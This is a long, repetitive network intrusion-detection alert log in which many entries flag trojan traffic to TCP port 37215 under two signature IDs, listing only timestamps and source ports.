                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.872041
                  SID:2829579
                  Source Port:49476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.912574
                  SID:2829579
                  Source Port:56720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629470
                  SID:2835222
                  Source Port:48920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.418046
                  SID:2835222
                  Source Port:57380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090625
                  SID:2835222
                  Source Port:56764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.696289
                  SID:2835222
                  Source Port:52380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.460852
                  SID:2835222
                  Source Port:58258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868019
                  SID:2835222
                  Source Port:47868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.798286
                  SID:2835222
                  Source Port:33686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.567410
                  SID:2829579
                  Source Port:44572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.766044
                  SID:2829579
                  Source Port:34370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.295464
                  SID:2829579
                  Source Port:36244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.446439
                  SID:2829579
                  Source Port:54176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.619862
                  SID:2829579
                  Source Port:57316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281423
                  SID:2829579
                  Source Port:38894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171488
                  SID:2829579
                  Source Port:44936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.435270
                  SID:2829579
                  Source Port:40370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.527687
                  SID:2829579
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.210866
                  SID:2835222
                  Source Port:34762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252129
                  SID:2829579
                  Source Port:35850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156684
                  SID:2829579
                  Source Port:58062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432060
                  SID:2835222
                  Source Port:52336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.852846
                  SID:2835222
                  Source Port:45210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2835222
                  Source Port:55360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.520739
                  SID:2829579
                  Source Port:42084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.733003
                  SID:2829579
                  Source Port:48432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.534474
                  SID:2835222
                  Source Port:60860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.776832
                  SID:2829579
                  Source Port:49138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.939929
                  SID:2829579
                  Source Port:53588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.954167
                  SID:2835222
                  Source Port:37600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271006
                  SID:2835222
                  Source Port:60440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.283062
                  SID:2829579
                  Source Port:44570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847591
                  SID:2829579
                  Source Port:47490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.493465
                  SID:2829579
                  Source Port:54880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.477635
                  SID:2835222
                  Source Port:60926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268531
                  SID:2835222
                  Source Port:43164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051851
                  SID:2829579
                  Source Port:47922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.849497
                  SID:2829579
                  Source Port:56190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850530
                  SID:2829579
                  Source Port:57982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.871233
                  SID:2829579
                  Source Port:49636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200422
                  SID:2829579
                  Source Port:48364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.948022
                  SID:2829579
                  Source Port:43512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.823408
                  SID:2829579
                  Source Port:52850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.658066
                  SID:2829579
                  Source Port:58228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.533087
                  SID:2835222
                  Source Port:43774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505906
                  SID:2829579
                  Source Port:37358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612817
                  SID:2829579
                  Source Port:38146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.558388
                  SID:2835222
                  Source Port:56164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383714
                  SID:2829579
                  Source Port:57076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903995
                  SID:2835222
                  Source Port:34882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.592095
                  SID:2835222
                  Source Port:59496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102239
                  SID:2829579
                  Source Port:39196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.927872
                  SID:2829579
                  Source Port:57468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.523000
                  SID:2835222
                  Source Port:38002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.294371
                  SID:2829579
                  Source Port:60242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.110610
                  SID:2835222
                  Source Port:50686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182114
                  SID:2829579
                  Source Port:45902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217883
                  SID:2835222
                  Source Port:47790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.219049
                  SID:2829579
                  Source Port:52960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.822021
                  SID:2835222
                  Source Port:58756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.657451
                  SID:2829579
                  Source Port:34934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.491951
                  SID:2829579
                  Source Port:54410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.580181
                  SID:2835222
                  Source Port:34688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.851044
                  SID:2835222
                  Source Port:39094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.349014
                  SID:2835222
                  Source Port:59492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.964382
                  SID:2835222
                  Source Port:49112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253799
                  SID:2835222
                  Source Port:49514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622607
                  SID:2835222
                  Source Port:46570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828801
                  SID:2829579
                  Source Port:44720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2835222
                  Source Port:35976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.913533
                  SID:2835222
                  Source Port:38726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.743340
                  SID:2829579
                  Source Port:57338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.115826
                  SID:2829579
                  Source Port:33734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.867302
                  SID:2829579
                  Source Port:58808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231891
                  SID:2835222
                  Source Port:33872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2835222
                  Source Port:38602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.586021
                  SID:2829579
                  Source Port:48394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.585577
                  SID:2835222
                  Source Port:52260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.976557
                  SID:2829579
                  Source Port:60058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879112
                  SID:2835222
                  Source Port:45220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.565038
                  SID:2835222
                  Source Port:39642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809992
                  SID:2829579
                  Source Port:42578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.501426
                  SID:2829579
                  Source Port:37886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814365
                  SID:2829579
                  Source Port:45744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.558808
                  SID:2829579
                  Source Port:59410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.862612
                  SID:2829579
                  Source Port:48996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.789175
                  SID:2835222
                  Source Port:42770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373658
                  SID:2829579
                  Source Port:52324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202392
                  SID:2829579
                  Source Port:52058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861984
                  SID:2835222
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.527707
                  SID:2835222
                  Source Port:39568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.127145
                  SID:2829579
                  Source Port:44212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564107
                  SID:2835222
                  Source Port:40442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.410235
                  SID:2835222
                  Source Port:55188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885642
                  SID:2835222
                  Source Port:54716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.490587
                  SID:2835222
                  Source Port:42618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.025097
                  SID:2835222
                  Source Port:54210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083690
                  SID:2829579
                  Source Port:32924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.944052
                  SID:2835222
                  Source Port:54662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.667183
                  SID:2835222
                  Source Port:59936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2829579
                  Source Port:33152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.087118
                  SID:2829579
                  Source Port:46340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.557326
                  SID:2829579
                  Source Port:45870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174460
                  SID:2829579
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564471
                  SID:2829579
                  Source Port:56972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.825440
                  SID:2829579
                  Source Port:35190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.315089
                  SID:2829579
                  Source Port:34316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.847677
                  SID:2835222
                  Source Port:49340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.662603
                  SID:2829579
                  Source Port:55938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122449
                  SID:2835222
                  Source Port:45422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.608891
                  SID:2829579
                  Source Port:56194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.736884
                  SID:2829579
                  Source Port:47322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.386314
                  SID:2829579
                  Source Port:52544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.187121
                  SID:2835222
                  Source Port:55562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.296944
                  SID:2835222
                  Source Port:59906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.683297
                  SID:2829579
                  Source Port:55166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.228923
                  SID:2829579
                  Source Port:40694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.930500
                  SID:2835222
                  Source Port:34698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.431055
                  SID:2835222
                  Source Port:35444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191147
                  SID:2829579
                  Source Port:39922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.907934
                  SID:2835222
                  Source Port:57226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2835222
                  Source Port:49406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2835222
                  Source Port:57098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.784198
                  SID:2835222
                  Source Port:50070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523896
                  SID:2829579
                  Source Port:53152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819309
                  SID:2835222
                  Source Port:42638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.633994
                  SID:2835222
                  Source Port:47380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.549542
                  SID:2829579
                  Source Port:36524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285736
                  SID:2829579
                  Source Port:44420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.634371
                  SID:2829579
                  Source Port:44564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.138927
                  SID:2835222
                  Source Port:46282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.473922
                  SID:2835222
                  Source Port:52964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.605633
                  SID:2835222
                  Source Port:55668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.475094
                  SID:2829579
                  Source Port:59930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.963171
                  SID:2829579
                  Source Port:49606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.092607
                  SID:2835222
                  Source Port:53536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003273
                  SID:2829579
                  Source Port:40794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151006
                  SID:2835222
                  Source Port:33560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985178
                  SID:2835222
                  Source Port:60688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861470
                  SID:2829579
                  Source Port:56766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.630891
                  SID:2829579
                  Source Port:49510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.432231
                  SID:2835222
                  Source Port:53758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198978
                  SID:2835222
                  Source Port:47540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.663912
                  SID:2835222
                  Source Port:51038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.809018
                  SID:2829579
                  Source Port:57338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981479
                  SID:2829579
                  Source Port:45940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652224
                  SID:2835222
                  Source Port:43164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.860796
                  SID:2829579
                  Source Port:50116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389213
                  SID:2829579
                  Source Port:36132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370948
                  SID:2829579
                  Source Port:41640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.151143
                  SID:2829579
                  Source Port:35018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.853366
                  SID:2829579
                  Source Port:41218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646424
                  SID:2829579
                  Source Port:38462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519019
                  SID:2829579
                  Source Port:34180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.019340
                  SID:2835222
                  Source Port:45718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.583920
                  SID:2829579
                  Source Port:59714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.560670
                  SID:2829579
                  Source Port:59270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.006424
                  SID:2829579
                  Source Port:41864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.367080
                  SID:2829579
                  Source Port:55878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807455
                  SID:2829579
                  Source Port:56600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.668883
                  SID:2829579
                  Source Port:37722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.387437
                  SID:2829579
                  Source Port:33574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.964611
                  SID:2835222
                  Source Port:59674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.164918
                  SID:2829579
                  Source Port:34212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.831755
                  SID:2829579
                  Source Port:48614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056369
                  SID:2835222
                  Source Port:50008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.976933
                  SID:2829579
                  Source Port:53702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196369
                  SID:2835222
                  Source Port:47196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527827
                  SID:2835222
                  Source Port:37036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.787394
                  SID:2829579
                  Source Port:37356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.551318
                  SID:2835222
                  Source Port:36592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.808905
                  SID:2835222
                  Source Port:56712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.773841
                  SID:2829579
                  Source Port:47060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.451424
                  SID:2835222
                  Source Port:32912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.460138
                  SID:2835222
                  Source Port:40970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.116791
                  SID:2835222
                  Source Port:60670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510800
                  SID:2835222
                  Source Port:36772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.958835
                  SID:2835222
                  Source Port:52406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624233
                  SID:2835222
                  Source Port:55298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.608891
                  SID:2829579
                  Source Port:42114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.565173
                  SID:2829579
                  Source Port:55562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478024
                  SID:2835222
                  Source Port:37038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.780436
                  SID:2829579
                  Source Port:60660
                  Destination Port:37215
